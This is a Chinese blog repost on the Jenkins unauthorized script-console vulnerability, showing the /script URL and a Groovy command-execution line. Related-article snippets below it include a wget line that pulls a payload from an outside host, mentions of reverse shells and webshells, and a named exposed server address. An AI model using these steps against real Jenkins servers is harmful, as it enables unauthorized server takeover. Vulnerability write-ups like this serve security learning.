jenkins 未授权访问-任意命令执行

最新推荐文章于 2024-08-04 22:58:41 发布
最新推荐文章于 2024-08-04 22:58:41 发布
阅读量757 收藏
点赞数
文章标签: 运维 shell
原文链接:http://blog.51cto.com/13770310/2156663
版权

jenkins 未授权访问-任意命令执行

0x00 jenkins简介

enkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。

0x01 漏洞原因

jenkins 未设置帐号密码,或者使用了弱帐号密码

0x02 漏洞复现

在默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,×××者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。
任意命令执行界面:
http://ip:port/script

println "ifconfig".execute().text

jenkins 未授权访问-任意命令执行

转载于:https://blog.51cto.com/13770310/2156663

weixin_33841503
关注
Jenkins功能授权访问导致的远程命令执行漏洞
limb0的博客
11-21 3318
Jenkins功能授权访问导致的远程命令执行漏洞 一、漏洞介绍 Jenkins管理登陆之后,后台”系统管理”功能,有个”脚本命令行的”功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,利用该功能,可以执行系统命令,该功能实际上Jenkins正常的功能,由于很多管理账号使用了弱口令,或者管理后台存在授权访问,导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。 二、漏洞危害...
授权访问Jenkins授权访问漏洞
qq_68163788的博客
05-10 2055
enkins是一个流行的开源持续集成和持续交付工具,用于自动化软件开发过程中的构建、测试和部署。然而,Jenkins存在一个授权访问漏洞,即攻击者可以通过授权的方式访问Jenkins服务器,可能导致敏感信息泄露、恶意代码执行等安全风险。攻击者可以利用这个漏洞来获取对Jenkins服务器的控制权,进而破坏软件构建过程,篡改部署流程或者窃取敏感数据。为了防范此类漏洞,管理员应该及时更新Jenkins软件版本、配置访问控制策略、监控系统日志等措施来加强安全防护。
Jenkins授权访问漏洞
最新发布
qq_68186313的博客
08-04 384
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。二:在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令。一、使用以下fofa语法进行产品搜索。Jenkins授权访问漏洞。
【漏洞学习——授权访问】慧聪网Jenkins系统授权访问
Fly_鹏程万里
02-22 950
漏洞细节 http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动) http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统) http://58.252.73.136:8080(jenkins管理后台,免密码访问) http://58.252.73.136:8080/script下执行cmd命令 println "ipconfi...
Jenkins授权访问漏洞
a6458360的博客
08-03 1106
文章目录 一、漏洞介绍 1.1 Jenkins介绍 1.2 漏洞原因 1.3 利用条件 二、环境配置 2.1 配置主机 2.2 下载安装 三、漏洞利用 3.1 信息收集 3.2 漏洞利用 四、防御建议 一、漏洞介绍 1.1 Jenkins介绍 Jenkins是一个基于Java开发的开源项目,可在Tomcat等流行的servlet容器中运行,也可以独立运行,其功能如下: 用于持续性、自动的构建/测试软件 项目监控或跑一些定时任务 监控外部调用执行的工作
Jenkins授权访问+命令执行
m0_49577923的博客
11-11 5892
前言 翻越高山需要迈出一个又一个简单的步伐 一、Jenkins简介 Jenkins是一个独立的、开放源码的自动化服务器,它可以用于自动化与构建、测试、交付或部署软件相关的各种任务。Jenkins是一个CI工具。它可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告 二、Jenkins授权访问 由于Jenkins默认安装的时候管理员安全意识不高,没有配置密码,所以可以导致任意用户授权访问到控制页面并且可以对里面的配置进行修改。 正常页面应该是需
Jenkins授权访问
weixin_43622525的博客
03-04 2814
Jenkins Jenkins简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,它能把软件开发过程形成工作流。默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。 Jenkins授权访问 部署Jenkins 1.62版本,将全局授权策略打开,目前新版本的Jenkins已默认需要用户登录,但老版的中默认配置是“任意用...
利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞(CVE-2018-1000861)
JiangBuLiu的博客
07-11 4516
Jenkins远程命令执行漏洞(CVE-2018-1000861)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现POC检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/ 漏洞原理 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这...
99-web漏洞挖掘之授权访问漏洞1
08-03
1. **Redis授权访问**:Redis是一种内存数据存储系统,若设置正确的访问控制,可能导致数据被任意读写,甚至被用来执行命令注入攻击。 2. **MongoDB授权访问**:MongoDB数据库若配置认证,可能导致数据大...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
CVE-2019-1003000是一个严重的安全漏洞,允许授权的攻击者在认证的情况下执行任意代码。复现这个漏洞需要对Java、Jenkins和网络请求有深入的理解。在实际环境中,必须及时修复此类漏洞,以防止潜在的攻击。...
jenkins授权rce windows主机getshell
m0_46689007的博客
12-11 1422
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
从代码层面分析Jenkins授权访问CVE-2017-1000353
stopys6的博客
09-13 241
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
中间件安全-jenkins授权访问
ce666666的博客
01-23 588
0x01 前言 跟着百度一步步做,也算是认识了​ 0x02 jenkins是什么? Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 ps:不搞java开发,了解即可。 0x03 漏洞概述 授权访问管理控制台,可以通过脚本命令执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。默认端口为8080 0x04 漏洞复现 .
【漏洞挖掘】——93、Jenkis授权访问
Fly_鹏程万里
06-17 134
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
Jenkins授权访问+命令执行反弹shell(复现)
weixin_54227009的博客
05-22 1716
我们大致了解过皮毛,可以在idea新建项目,经过简单调整格式,本地测试可以运行,浏览器访问发现没有Jenkins没有设置密码,直接就授权进后台了。1、打内网的时候通过fscan扫到了一台Jenkins服务的机子。3.3在Jenkins的脚本命令执行反弹shell命令。3.2在菱角社区搞一个反弹shell命令在线生成。2、在系统管理->脚本命令行。3.1在kali上设置监听。
利用Jenkins授权获取服务器权限--Docker还来干扰--一次渗透的经历
weixin_30270889的博客
08-13 634
Jenkins获取权限的过程 Jenkins存在授权访问漏洞 Jenkins存在授权访问漏洞,且项目具有读取权限,通过项目的日志获取到一个账号密码,尝试登录成功,打开控制台成功。 备注:控制台一般可以进去后直接URL输入http://a.b.c.d/script 即可进入 执行命令尝试反弹shell 在对话框中尝试反弹shell,本地NC监听中,发行不行,尝试ping回来,发现网...
Jenkins授权访问漏洞&命令执行
qq_45434762的博客
03-28 9531
Jenkins授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
Jenkins授权访问脚本执行漏洞
weixin_30883777的博客
05-17 727
Jenkins授权访问脚本执行漏洞 步骤 首先找一个站点挂上一个反弹shell脚本,然后在脚本执行框里执行脚本进行下载到tmp目录: println "wget http://47.95.XXX.XXX/xxx.py -P /tmp/".execute().text 执行成功下面Result并没有反馈 然后我们执行命令允许反弹shell脚本 println "python...
Jenkins Git client插件CVE-2019-10392:命令执行漏洞分析
Jenkins Git client插件命令执行漏洞(CVE-2019-10392) Jenkins Git client插件是一个广泛使用的工具,它允许Jenkins与Git版本控制系统进行交互,以便在持续集成和持续部署流程中自动获取代码仓库的更新。然而,在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值